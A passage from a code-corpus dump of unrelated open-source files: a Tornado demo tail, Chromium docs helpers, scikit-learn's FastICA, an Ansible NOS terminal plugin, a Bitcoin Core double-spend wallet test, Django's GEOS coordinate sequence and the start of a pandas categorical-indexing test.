self.redirect(self.get_argument("next", "/"))
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("user")
self.redirect(self.get_argument("next", "/"))
class EntryModule(tornado.web.UIModule):
def render(self, entry):
return self.render_string("modules/entry.html", entry=entry)
def main():
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
apache-2.0
|
VanirAOSP/external_chromium_org
|
chrome/common/extensions/docs/server2/docs_server_utils.py
|
27
|
1296
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from base64 import b64encode
from hashlib import sha1
import os
def FormatKey(key):
'''Normalize a key by making sure it has a .html extension, and convert any
'.'s to '_'s.
'''
if key.endswith('.html'):
key = key[:-len('.html')]
safe_key = key.replace('.', '_')
return '%s.html' % safe_key
def SanitizeAPIName(name):
'''Sanitizes API filenames that are in subdirectories.
'''
filename = os.path.splitext(name)[0].replace(os.sep, '_')
if 'experimental' in filename:
filename = 'experimental_' + filename.replace('experimental_', '')
return filename
def StringIdentity(string):
'''Creates a small hash of a string.
'''
return b64encode(sha1(string).digest())[:8]
def MarkLast(dicts):
'''Adds a property 'last' == True to the last element in a list of dicts.
'''
if len(dicts) > 0:
dicts[-1]['last'] = True
def ToUnicode(data):
'''Returns the str |data| as a unicode object. It's expected to be utf8, but
there are also latin-1 encodings in there for some reason. Fall back to that.
'''
try:
return unicode(data, 'utf-8')
except:
return unicode(data, 'latin-1')
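# Illustrative results of the helpers above (not exercised in this module):
#   FormatKey('extensions.api.html') -> 'extensions_api.html'
#   SanitizeAPIName('experimental/foo.json') -> 'experimental_foo'
#   StringIdentity('foo') -> an 8-character base64 prefix of sha1('foo')
#   MarkLast([{'x': 1}, {'x': 2}]) sets 'last': True on the second dict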
|
bsd-3-clause
|
dingocuster/scikit-learn
|
sklearn/decomposition/fastica_.py
|
199
|
18122
|
"""
Python implementation of the fast ICA algorithms.
Reference: Tables 8.3 and 8.4 page 196 in the book:
Independent Component Analysis, by Hyvarinen et al.
"""
# Authors: Pierre Lafaye de Micheaux, Stefan van der Walt, Gael Varoquaux,
# Bertrand Thirion, Alexandre Gramfort, Denis A. Engemann
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..externals import six
from ..externals.six import moves
from ..utils import check_array, as_float_array, check_random_state
from ..utils.extmath import fast_dot
from ..utils.validation import check_is_fitted
__all__ = ['fastica', 'FastICA']
def _gs_decorrelation(w, W, j):
"""
Orthonormalize w wrt the first j rows of W
Parameters
----------
w : ndarray of shape(n)
Array to be orthogonalized
W : ndarray of shape(p, n)
Null space definition
j : int < p
The number of leading rows of the null space W with respect to which
w is orthogonalized.
Notes
-----
Assumes that W is orthogonal
w changed in place
"""
w -= np.dot(np.dot(w, W[:j].T), W[:j])
return w
def _sym_decorrelation(W):
""" Symmetric decorrelation
i.e. W <- (W * W.T) ^{-1/2} * W
"""
s, u = linalg.eigh(np.dot(W, W.T))
# u (resp. s) contains the eigenvectors (resp. square roots of
# the eigenvalues) of W * W.T
return np.dot(np.dot(u * (1. / np.sqrt(s)), u.T), W)
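# A quick sanity check of the identity above (illustrative only, not used
# elsewhere in this module): the decorrelated matrix has orthonormal rows.
#   >>> rng = np.random.RandomState(0)
#   >>> Wd = _sym_decorrelation(rng.randn(3, 3))
#   >>> np.allclose(np.dot(Wd, Wd.T), np.eye(3))
#   True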
def _ica_def(X, tol, g, fun_args, max_iter, w_init):
"""Deflationary FastICA using fun approx to neg-entropy function
Used internally by FastICA.
"""
n_components = w_init.shape[0]
W = np.zeros((n_components, n_components), dtype=X.dtype)
n_iter = []
# j is the index of the extracted component
for j in range(n_components):
w = w_init[j, :].copy()
w /= np.sqrt((w ** 2).sum())
for i in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(w.T, X), fun_args)
w1 = (X * gwtx).mean(axis=1) - g_wtx.mean() * w
_gs_decorrelation(w1, W, j)
w1 /= np.sqrt((w1 ** 2).sum())
lim = np.abs(np.abs((w1 * w).sum()) - 1)
w = w1
if lim < tol:
break
n_iter.append(i + 1)
W[j, :] = w
return W, max(n_iter)
def _ica_par(X, tol, g, fun_args, max_iter, w_init):
"""Parallel FastICA.
Used internally by FastICA --main loop
"""
W = _sym_decorrelation(w_init)
del w_init
p_ = float(X.shape[1])
for ii in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(W, X), fun_args)
W1 = _sym_decorrelation(fast_dot(gwtx, X.T) / p_
- g_wtx[:, np.newaxis] * W)
del gwtx, g_wtx
# builtin max, abs are faster than numpy counterparts.
lim = max(abs(abs(np.diag(fast_dot(W1, W.T))) - 1))
W = W1
if lim < tol:
break
else:
warnings.warn('FastICA did not converge. Consider increasing '
'tolerance or the maximum number of iterations.')
return W, ii + 1
# Some standard non-linear functions.
# XXX: these should be optimized, as they can be a bottleneck.
def _logcosh(x, fun_args=None):
alpha = fun_args.get('alpha', 1.0) # comment it out?
x *= alpha
gx = np.tanh(x, x) # apply the tanh inplace
g_x = np.empty(x.shape[0])
# XXX compute in chunks to avoid extra allocation
for i, gx_i in enumerate(gx): # please don't vectorize.
g_x[i] = (alpha * (1 - gx_i ** 2)).mean()
return gx, g_x
def _exp(x, fun_args):
exp = np.exp(-(x ** 2) / 2)
gx = x * exp
g_x = (1 - x ** 2) * exp
return gx, g_x.mean(axis=-1)
def _cube(x, fun_args):
return x ** 3, (3 * x ** 2).mean(axis=-1)
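# For instance (illustrative): _cube(np.array([1., 2.]), None) returns
# (array([1., 8.]), 7.5), i.e. x ** 3 and the mean of 3 * x ** 2.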
def fastica(X, n_components=None, algorithm="parallel", whiten=True,
fun="logcosh", fun_args=None, max_iter=200, tol=1e-04, w_init=None,
random_state=None, return_X_mean=False, compute_sources=True,
return_n_iter=False):
"""Perform Fast Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
n_components : int, optional
Number of components to extract. If None no dimension reduction
is performed.
algorithm : {'parallel', 'deflation'}, optional
Apply a parallel or deflational FASTICA algorithm.
whiten : boolean, optional
If True perform an initial whitening of the data.
If False, the data is assumed to have already been
preprocessed: it should be centered, normed and white.
Otherwise you will get incorrect results.
In this case the parameter n_components will be ignored.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty or None and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter : int, optional
Maximum number of iterations to perform.
tol : float, optional
A positive scalar giving the tolerance at which the
un-mixing matrix is considered to have converged.
w_init : (n_components, n_components) array, optional
Initial un-mixing array of dimension (n.comp,n.comp).
If None (default) then an array of normal r.v.'s is used.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
return_X_mean : bool, optional
If True, X_mean is returned too.
compute_sources : bool, optional
If False, sources are not computed, but only the rotation matrix.
This can save memory when working with big data. Defaults to True.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
K : array, shape (n_components, n_features) | None.
If whiten is 'True', K is the pre-whitening matrix that projects data
onto the first n_components principal components. If whiten is 'False',
K is 'None'.
W : array, shape (n_components, n_components)
Estimated un-mixing matrix.
The mixing matrix can be obtained by::
w = np.dot(W, K.T)
A = w.T * (w * w.T).I
S : array, shape (n_samples, n_components) | None
Estimated source matrix
X_mean : array, shape (n_features, )
The mean over features. Returned only if return_X_mean is True.
n_iter : int
If the algorithm is "deflation", n_iter is the
maximum number of iterations run across all components. Otherwise
it is just the number of iterations taken to converge. This is
returned only when return_n_iter is set to `True`.
Notes
-----
The data matrix X is considered to be a linear combination of
non-Gaussian (independent) components i.e. X = AS where columns of S
contain the independent components and A is a linear mixing
matrix. In short ICA attempts to `un-mix' the data by estimating an
un-mixing matrix W where ``S = W K X.``
This implementation was originally made for data of shape
[n_features, n_samples]. Now the input is transposed
before the algorithm is applied. This makes it slightly
faster for Fortran-ordered input.
Implemented using FastICA:
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
random_state = check_random_state(random_state)
fun_args = {} if fun_args is None else fun_args
# make interface compatible with other decompositions
# a copy is required only for non whitened data
X = check_array(X, copy=whiten).T
alpha = fun_args.get('alpha', 1.0)
if not 1 <= alpha <= 2:
raise ValueError('alpha must be in [1,2]')
if fun == 'logcosh':
g = _logcosh
elif fun == 'exp':
g = _exp
elif fun == 'cube':
g = _cube
elif callable(fun):
def g(x, fun_args):
return fun(x, **fun_args)
else:
exc = ValueError if isinstance(fun, six.string_types) else TypeError
raise exc("Unknown function %r;"
" should be one of 'logcosh', 'exp', 'cube' or callable"
% fun)
n, p = X.shape
if not whiten and n_components is not None:
n_components = None
warnings.warn('Ignoring n_components with whiten=False.')
if n_components is None:
n_components = min(n, p)
if (n_components > min(n, p)):
n_components = min(n, p)
print("n_components is too large: it will be set to %s" % n_components)
if whiten:
# Centering the columns (ie the variables)
X_mean = X.mean(axis=-1)
X -= X_mean[:, np.newaxis]
# Whitening and preprocessing by PCA
u, d, _ = linalg.svd(X, full_matrices=False)
del _
K = (u / d).T[:n_components] # see (6.33) p.140
del u, d
X1 = np.dot(K, X)
# see (13.6) p.267 Here X1 is white and data
# in X has been projected onto a subspace by PCA
X1 *= np.sqrt(p)
else:
# X must be cast to floats to avoid typing issues with numpy
# 2.0 and the line below
X1 = as_float_array(X, copy=False) # copy has been taken care of
if w_init is None:
w_init = np.asarray(random_state.normal(size=(n_components,
n_components)), dtype=X1.dtype)
else:
w_init = np.asarray(w_init)
if w_init.shape != (n_components, n_components):
raise ValueError('w_init has invalid shape -- should be %(shape)s'
% {'shape': (n_components, n_components)})
kwargs = {'tol': tol,
'g': g,
'fun_args': fun_args,
'max_iter': max_iter,
'w_init': w_init}
if algorithm == 'parallel':
W, n_iter = _ica_par(X1, **kwargs)
elif algorithm == 'deflation':
W, n_iter = _ica_def(X1, **kwargs)
else:
raise ValueError('Invalid algorithm: must be either `parallel` or'
' `deflation`.')
del X1
if whiten:
if compute_sources:
S = fast_dot(fast_dot(W, K), X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return K, W, S, X_mean, n_iter
else:
return K, W, S, X_mean
else:
if return_n_iter:
return K, W, S, n_iter
else:
return K, W, S
else:
if compute_sources:
S = fast_dot(W, X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return None, W, S, None, n_iter
else:
return None, W, S, None
else:
if return_n_iter:
return None, W, S, n_iter
else:
return None, W, S
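# Illustrative use of the functional API (values are for demonstration only;
# with the defaults the function returns the (K, W, S) triple):
#   >>> rng = np.random.RandomState(42)
#   >>> S_true = rng.standard_t(1.5, size=(1000, 2))   # non-Gaussian sources
#   >>> A = np.array([[1., 1.], [0., 2.]])              # mixing matrix
#   >>> X = np.dot(S_true, A.T)                         # observed mixtures
#   >>> K, W, S_est = fastica(X, n_components=2, random_state=0)
#   >>> S_est.shape
#   (1000, 2)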
class FastICA(BaseEstimator, TransformerMixin):
"""FastICA: a fast algorithm for Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
n_components : int, optional
Number of components to use. If none is passed, all are used.
algorithm : {'parallel', 'deflation'}
Apply parallel or deflational algorithm for FastICA.
whiten : boolean, optional
If whiten is false, the data is already considered to be
whitened, and no whitening is performed.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}.
max_iter : int, optional
Maximum number of iterations during fit.
tol : float, optional
Tolerance on update at each iteration.
w_init : None or an (n_components, n_components) ndarray
The mixing matrix to be used to initialize the algorithm.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
components_ : 2D array, shape (n_components, n_features)
The unmixing matrix.
mixing_ : array, shape (n_features, n_components)
The mixing matrix.
n_iter_ : int
If the algorithm is "deflation", n_iter is the
maximum number of iterations run across all components. Otherwise
it is just the number of iterations taken to converge.
Notes
-----
Implementation based on
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
def __init__(self, n_components=None, algorithm='parallel', whiten=True,
fun='logcosh', fun_args=None, max_iter=200, tol=1e-4,
w_init=None, random_state=None):
super(FastICA, self).__init__()
self.n_components = n_components
self.algorithm = algorithm
self.whiten = whiten
self.fun = fun
self.fun_args = fun_args
self.max_iter = max_iter
self.tol = tol
self.w_init = w_init
self.random_state = random_state
def _fit(self, X, compute_sources=False):
"""Fit the model
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
compute_sources : bool
If False, sources are not computed but only the rotation matrix.
This can save memory when working with big data. Defaults to False.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
fun_args = {} if self.fun_args is None else self.fun_args
whitening, unmixing, sources, X_mean, self.n_iter_ = fastica(
X=X, n_components=self.n_components, algorithm=self.algorithm,
whiten=self.whiten, fun=self.fun, fun_args=fun_args,
max_iter=self.max_iter, tol=self.tol, w_init=self.w_init,
random_state=self.random_state, return_X_mean=True,
compute_sources=compute_sources, return_n_iter=True)
if self.whiten:
self.components_ = np.dot(unmixing, whitening)
self.mean_ = X_mean
self.whitening_ = whitening
else:
self.components_ = unmixing
self.mixing_ = linalg.pinv(self.components_)
if compute_sources:
self.__sources = sources
return sources
def fit_transform(self, X, y=None):
"""Fit the model and recover the sources from X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
return self._fit(X, compute_sources=True)
def fit(self, X, y=None):
"""Fit the model to X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self
"""
self._fit(X, compute_sources=False)
return self
def transform(self, X, y=None, copy=True):
"""Recover the sources from X (apply the unmixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data to transform, where n_samples is the number of samples
and n_features is the number of features.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'mixing_')
X = check_array(X, copy=copy)
if self.whiten:
X -= self.mean_
return fast_dot(X, self.components_.T)
def inverse_transform(self, X, copy=True):
"""Transform the sources back to the mixed data (apply mixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_components)
Sources, where n_samples is the number of samples
and n_components is the number of components.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_features)
"""
check_is_fitted(self, 'mixing_')
if copy:
X = X.copy()
X = fast_dot(X, self.mixing_.T)
if self.whiten:
X += self.mean_
return X
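# Illustrative use of the estimator API (values are for demonstration only):
#   >>> rng = np.random.RandomState(0)
#   >>> X = rng.laplace(size=(500, 3))
#   >>> ica = FastICA(n_components=3, random_state=0)
#   >>> S = ica.fit_transform(X)          # estimated sources, shape (500, 3)
#   >>> ica.inverse_transform(S).shape    # back to the mixed-signal space
#   (500, 3)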
|
bsd-3-clause
|
EvanK/ansible
|
lib/ansible/plugins/terminal/nos.py
|
177
|
1962
|
#
# (c) 2018 Extreme Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from ansible.errors import AnsibleConnectionFailure
from ansible.plugins.terminal import TerminalBase
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br"([\r\n]|(\x1b\[\?7h))[\w\+\-\.:\/\[\]]+(?:\([^\)]+\)){0,3}(?:[>#]) ?$")
]
terminal_stderr_re = [
re.compile(br"% ?Error"),
# re.compile(br"^% \w+", re.M),
re.compile(br"% ?Bad secret"),
re.compile(br"[\r\n%] Bad passwords"),
re.compile(br"invalid input", re.I),
re.compile(br"(?:incomplete|ambiguous) command", re.I),
re.compile(br"connection timed out", re.I),
re.compile(br"[^\r\n]+ not found"),
re.compile(br"'[^']' +returned error code: ?\d+"),
re.compile(br"Bad mask", re.I),
re.compile(br"% ?(\S+) ?overlaps with ?(\S+)", re.I),
re.compile(br"[%\S] ?Informational: ?[\s]+", re.I),
re.compile(br"syntax error: unknown argument.", re.I)
]
def on_open_shell(self):
try:
self._exec_cli_command(u'terminal length 0')
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
|
gpl-3.0
|
jtimon/bitcoin
|
test/functional/wallet_txn_doublespend.py
|
6
|
6036
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there is a double-spend conflict."""
from decimal import Decimal
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
disconnect_nodes,
find_output,
)
class TxnMallTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
super().setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
# All nodes should start with 1,250 BTC:
starting_balance = 1250
# All nodes should be out of IBD.
# If the nodes are not all out of IBD, that can interfere with
# blockchain sync later in the test when nodes are connected, due to
# timing issues.
for n in self.nodes:
assert n.getblockchaininfo()["initialblockdownload"] == False
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround: coins generated are assigned to the first getnewaddress!
# Assign coins to foo and bar addresses:
node0_address_foo = self.nodes[0].getnewaddress()
fund_foo_txid = self.nodes[0].sendtoaddress(node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress()
fund_bar_txid = self.nodes[0].sendtoaddress(node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(),
starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress()
# First: use raw transaction API to send 1240 BTC to node1_address,
# but don't broadcast:
doublespend_fee = Decimal('-.02')
rawtx_input_0 = {}
rawtx_input_0["txid"] = fund_foo_txid
rawtx_input_0["vout"] = find_output(self.nodes[0], fund_foo_txid, 1219)
rawtx_input_1 = {}
rawtx_input_1["txid"] = fund_bar_txid
rawtx_input_1["vout"] = find_output(self.nodes[0], fund_bar_txid, 29)
inputs = [rawtx_input_0, rawtx_input_1]
change_address = self.nodes[0].getnewaddress()
outputs = {}
outputs[node1_address] = 1240
outputs[change_address] = 1248 - 1240 + doublespend_fee
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
doublespend = self.nodes[0].signrawtransactionwithwallet(rawtx)
assert_equal(doublespend["complete"], True)
# Create two spends, each using one 50 BTC coin
txid1 = self.nodes[0].sendtoaddress(node1_address, 40)
txid2 = self.nodes[0].sendtoaddress(node1_address, 20)
# Have node0 mine a block:
if (self.options.mine_block):
self.nodes[0].generate(1)
self.sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50BTC for another
# matured block, minus 40, minus 20, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block:
expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance(), starting_balance - tx1["amount"] - tx2["amount"])
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Now give doublespend and its parents to miner:
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
doublespend_txid = self.nodes[2].sendrawtransaction(doublespend["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].generate(1) # Mine another block to make sure we sync
self.sync_blocks()
assert_equal(self.nodes[0].gettransaction(doublespend_txid)["confirmations"], 2)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Both transactions should be conflicted
assert_equal(tx1["confirmations"], -2)
assert_equal(tx2["confirmations"], -2)
# Node0's total balance should be starting balance, plus 100BTC for
# two more matured blocks, minus 1240 for the double-spend, plus fees (which are
# negative):
expected = starting_balance + 100 - 1240 + fund_foo_tx["fee"] + fund_bar_tx["fee"] + doublespend_fee
assert_equal(self.nodes[0].getbalance(), expected)
# Node1's balance should be its initial balance (1250 for 25 block rewards) plus the doublespend:
assert_equal(self.nodes[1].getbalance(), 1250 + 1240)
if __name__ == '__main__':
TxnMallTest().main()
|
mit
|
Amechi101/concepteur-market-app
|
venv/lib/python2.7/site-packages/django/contrib/gis/geos/coordseq.py
|
219
|
5438
|
"""
This module houses the GEOSCoordSeq object, which is used internally
by GEOSGeometry to house the actual coordinates of the Point,
LineString, and LinearRing geometries.
"""
from ctypes import c_double, c_uint, byref
from django.contrib.gis.geos.base import GEOSBase, numpy
from django.contrib.gis.geos.error import GEOSException, GEOSIndexError
from django.contrib.gis.geos.libgeos import CS_PTR
from django.contrib.gis.geos import prototypes as capi
from django.utils.six.moves import xrange
class GEOSCoordSeq(GEOSBase):
"The internal representation of a list of coordinates inside a Geometry."
ptr_type = CS_PTR
#### Python 'magic' routines ####
def __init__(self, ptr, z=False):
"Initializes from a GEOS pointer."
if not isinstance(ptr, CS_PTR):
raise TypeError('Coordinate sequence should initialize with a CS_PTR.')
self._ptr = ptr
self._z = z
def __iter__(self):
"Iterates over each point in the coordinate sequence."
for i in xrange(self.size):
yield self[i]
def __len__(self):
"Returns the number of points in the coordinate sequence."
return int(self.size)
def __str__(self):
"Returns the string representation of the coordinate sequence."
return str(self.tuple)
def __getitem__(self, index):
"Returns the coordinate sequence value at the given index."
coords = [self.getX(index), self.getY(index)]
if self.dims == 3 and self._z:
coords.append(self.getZ(index))
return tuple(coords)
def __setitem__(self, index, value):
"Sets the coordinate sequence value at the given index."
# Checking the input value
if isinstance(value, (list, tuple)):
pass
elif numpy and isinstance(value, numpy.ndarray):
pass
else:
raise TypeError('Must set coordinate with a sequence (list, tuple, or numpy array).')
# Checking the dims of the input
if self.dims == 3 and self._z:
n_args = 3
set_3d = True
else:
n_args = 2
set_3d = False
if len(value) != n_args:
raise TypeError('Dimension of value does not match.')
# Setting the X, Y, Z
self.setX(index, value[0])
self.setY(index, value[1])
if set_3d: self.setZ(index, value[2])
#### Internal Routines ####
def _checkindex(self, index):
"Checks the given index."
sz = self.size
if (sz < 1) or (index < 0) or (index >= sz):
raise GEOSIndexError('invalid GEOS Geometry index: %s' % str(index))
def _checkdim(self, dim):
"Checks the given dimension."
if dim < 0 or dim > 2:
raise GEOSException('invalid ordinate dimension "%d"' % dim)
#### Ordinate getting and setting routines ####
def getOrdinate(self, dimension, index):
"Returns the value for the given dimension and index."
self._checkindex(index)
self._checkdim(dimension)
return capi.cs_getordinate(self.ptr, index, dimension, byref(c_double()))
def setOrdinate(self, dimension, index, value):
"Sets the value for the given dimension and index."
self._checkindex(index)
self._checkdim(dimension)
capi.cs_setordinate(self.ptr, index, dimension, value)
def getX(self, index):
"Get the X value at the index."
return self.getOrdinate(0, index)
def setX(self, index, value):
"Set X with the value at the given index."
self.setOrdinate(0, index, value)
def getY(self, index):
"Get the Y value at the given index."
return self.getOrdinate(1, index)
def setY(self, index, value):
"Set Y with the value at the given index."
self.setOrdinate(1, index, value)
def getZ(self, index):
"Get Z with the value at the given index."
return self.getOrdinate(2, index)
def setZ(self, index, value):
"Set Z with the value at the given index."
self.setOrdinate(2, index, value)
### Dimensions ###
@property
def size(self):
"Returns the size of this coordinate sequence."
return capi.cs_getsize(self.ptr, byref(c_uint()))
@property
def dims(self):
"Returns the dimensions of this coordinate sequence."
return capi.cs_getdims(self.ptr, byref(c_uint()))
@property
def hasz(self):
"""
Returns whether this coordinate sequence is 3D. This property value is
inherited from the parent Geometry.
"""
return self._z
### Other Methods ###
def clone(self):
"Clones this coordinate sequence."
return GEOSCoordSeq(capi.cs_clone(self.ptr), self.hasz)
@property
def kml(self):
"Returns the KML representation for the coordinates."
# Getting the substitution string depending on whether the coordinates have
# a Z dimension.
if self.hasz: substr = '%s,%s,%s '
else: substr = '%s,%s,0 '
return '<coordinates>%s</coordinates>' % \
''.join([substr % self[i] for i in xrange(len(self))]).strip()
@property
def tuple(self):
"Returns a tuple version of this coordinate sequence."
n = self.size
if n == 1: return self[0]
else: return tuple([self[i] for i in xrange(n)])
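# Illustrative usage via a geometry's ``coord_seq`` property (assumes a
# working GEOS installation; output shown for a simple 2D line):
#   >>> from django.contrib.gis.geos import LineString
#   >>> cs = LineString((0, 0), (1, 1)).coord_seq
#   >>> cs.size, cs.tuple
#   (2, ((0.0, 0.0), (1.0, 1.0)))
#   >>> cs[0]
#   (0.0, 0.0)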
|
mit
|
Winand/pandas
|
pandas/tests/indexing/test_categorical.py
|
5
|
17421
|
# -*- coding: utf-8 -*-
import pytest
import pandas as pd
import numpy as np
from pandas import (Series, DataFrame, Timestamp,
Categorical, CategoricalIndex)
from pandas.util.testing import assert_series_equal, assert_frame_equal
from pandas.util import testing as tm
class TestCategoricalIndex(object):
def setup_method(self, method):
self.df = DataFrame({'A': np.arange(6, dtype='int64'),
'B': Series(list('aabbca')).astype(
'category', categories=list(
'cab'))}).set_index('B')
self.df2 = DataFrame({'A': np.arange(6, dtype='int64'),
'B': Series(list('aabbca')).astype(
'category', categories=list(
'cabe'))}).set_index('B')
self.df3 = DataFrame({'A': np.arange(6, dtype='int64'),
'B': (Series([1, 1, 2, 1, 3, 2])
.astype('category', categories=[3, 2, 1],
ordered=True))}).set_index('B')
self.df4 = DataFrame({'A': np.arange(6, dtype='int64'),
'B': (Series([1, 1, 2, 1, 3, 2])
.astype('category', categories=[3, 2, 1],
ordered=False))}).set_index('B')
def test_loc_scalar(self):
result = self.df.loc['a']
expected = (DataFrame({'A': [0, 1, 5],
'B': (Series(list('aaa'))
.astype('category',
categories=list('cab')))})
.set_index('B'))
assert_frame_equal(result, expected)
df = self.df.copy()
df.loc['a'] = 20
expected = (DataFrame({'A': [20, 20, 2, 3, 4, 20],
'B': (Series(list('aabbca'))
.astype('category',
categories=list('cab')))})
.set_index('B'))
assert_frame_equal(df, expected)
# value not in the categories
pytest.raises(KeyError, lambda: df.loc['d'])
def f():
df.loc['d'] = 10
pytest.raises(TypeError, f)
def f():
df.loc['d', 'A'] = 10
pytest.raises(TypeError, f)
def f():
df.loc['d', 'C'] = 10
pytest.raises(TypeError, f)
def test_getitem_scalar(self):
cats = Categorical([Timestamp('12-31-1999'),
Timestamp('12-31-2000')])
s = Series([1, 2], index=cats)
expected = s.iloc[0]
result = s[cats[0]]
assert result == expected
def test_loc_listlike(self):
# list of labels
result = self.df.loc[['c', 'a']]
expected = self.df.iloc[[4, 0, 1, 5]]
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.loc[['a', 'b', 'e']]
exp_index = CategoricalIndex(
list('aaabbe'), categories=list('cabe'), name='B')
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan]}, index=exp_index)
assert_frame_equal(result, expected, check_index_type=True)
# element in the categories but not in the values
pytest.raises(KeyError, lambda: self.df2.loc['e'])
# assign is ok
df = self.df2.copy()
df.loc['e'] = 20
result = df.loc[['a', 'b', 'e']]
exp_index = CategoricalIndex(
list('aaabbe'), categories=list('cabe'), name='B')
expected = DataFrame({'A': [0, 1, 5, 2, 3, 20]}, index=exp_index)
assert_frame_equal(result, expected)
df = self.df2.copy()
result = df.loc[['a', 'b', 'e']]
exp_index = CategoricalIndex(
list('aaabbe'), categories=list('cabe'), name='B')
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan]}, index=exp_index)
assert_frame_equal(result, expected, check_index_type=True)
# not all labels in the categories
pytest.raises(KeyError, lambda: self.df2.loc[['a', 'd']])
def test_loc_listlike_dtypes(self):
# GH 11586
# unique categories and codes
index = CategoricalIndex(['a', 'b', 'c'])
